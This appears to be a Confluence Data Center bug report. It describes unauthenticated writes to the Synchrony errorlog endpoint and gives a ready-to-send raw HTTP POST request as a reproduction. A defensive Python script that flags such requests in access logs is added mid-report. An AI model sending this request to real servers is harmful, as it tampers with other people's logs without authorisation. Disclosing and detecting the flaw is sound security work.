h3. Issue Summary
It is possible to write log entries via Synchrony API without authentication.
h3. Steps to Reproduce
To reproduce, enter the target URL (<base URL>) in Postman, copy the GET or POST request below and send the HTTP request.
For all POST requests, you must ensure that the Content-Length header matches the body (e.g. if the POST body has 231 characters, the Content-Length must also be 231). I have marked in orange what to look out for in the individual inquiries.
Send the following http POST request to the web server:
{noformat}
POST /synchrony/v1/errorlog HTTP/1.1
Host: <baseURL>
Content-Length: 206
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: <baseURL>
Referer: <baseURL>/pages/resumedraft.action?draftId=22839529&draftShareId=8ed7dcf2-8b7e-41c4-aa0b-a8511dad37fb&
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
{"clientId":"IJjq9O5FeRuZWfZ60tthnzs", "entityId":"/Synchrony-1274ffbb-8ef2-3131-b438-d2b6304af43f/confluence-22839528", "message":"test error message", "source":"client", "oo":"test_error", "clientId":"test"}
{noformat}
h3. Expected Results
Nothing should be written to the logs when an unauthenticated user sends the request.
h3. Actual Results
An unauthenticated user can write to the log.
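Until the endpoint is fixed, the practical defender-side measure is to watch the access log for the pattern this report describes: POSTs to /synchrony/v1/errorlog that carry no authenticated Confluence user yet are accepted with a 2xx status. The following Python script is an added example, not part of this issue or of Atlassian's code. The log lines are constructed, and their layout ("[timestamp] user client-ip "request-line" status") is an assumption for the example; adjust LINE_RE to the access-log pattern your Confluence node actually writes.

```python
import re
from collections import Counter

# Constructed sample access-log lines (not real server output). The layout
# "[timestamp] user client-ip "request-line" status" is an assumption for this
# example; "-" in the user field means the request carried no Confluence session.
SAMPLE_LOG = """\
[10/May/2021:12:00:01 +0200] admin 10.0.0.5 "POST /synchrony/v1/errorlog HTTP/1.1" 200
[10/May/2021:12:00:02 +0200] - 203.0.113.7 "POST /synchrony/v1/errorlog HTTP/1.1" 200
[10/May/2021:12:00:03 +0200] - 203.0.113.7 "POST /synchrony/v1/errorlog HTTP/1.1" 200
[10/May/2021:12:00:04 +0200] - 203.0.113.9 "GET /synchrony/v1/bayeux-sync1 HTTP/1.1" 200
[10/May/2021:12:00:05 +0200] jdoe 10.0.0.6 "GET /pages/viewpage.action?pageId=1 HTTP/1.1" 200
"""

LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] (?P<user>\S+) (?P<ip>\S+) '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})$'
)

# Endpoint named in this report.
ERRORLOG_PATH = "/synchrony/v1/errorlog"


def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def find_unauthenticated_errorlog_writes(log_text):
    """Return the records of POSTs to the Synchrony errorlog endpoint that had no
    authenticated user and were still accepted (2xx status)."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore any query string
        if (rec["method"] == "POST" and path == ERRORLOG_PATH
                and rec["user"] == "-" and rec["status"].startswith("2")):
            findings.append(rec)
    return findings


def count_by_source_ip(findings):
    """Aggregate findings per client IP, to spot one source flooding the log."""
    return Counter(rec["ip"] for rec in findings)


if __name__ == "__main__":
    hits = find_unauthenticated_errorlog_writes(SAMPLE_LOG)
    for rec in hits:
        print(f"{rec['ts']} unauthenticated errorlog write from {rec['ip']}")
    print(dict(count_by_source_ip(hits)))
```

Run over the sample, the script reports the two unauthenticated writes from 203.0.113.7 and ignores the authenticated POST and the unrelated Synchrony and page requests. The per-IP count is the number to alert on: a burst from one address indicates the endpoint is being used to fill the log.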
h3. Workaround
Currently there is no known workaround for this behavior. A workaround will be added here when available.
||CPE||Name||Operator||Version||
| |confluence data center|le|7.4.0|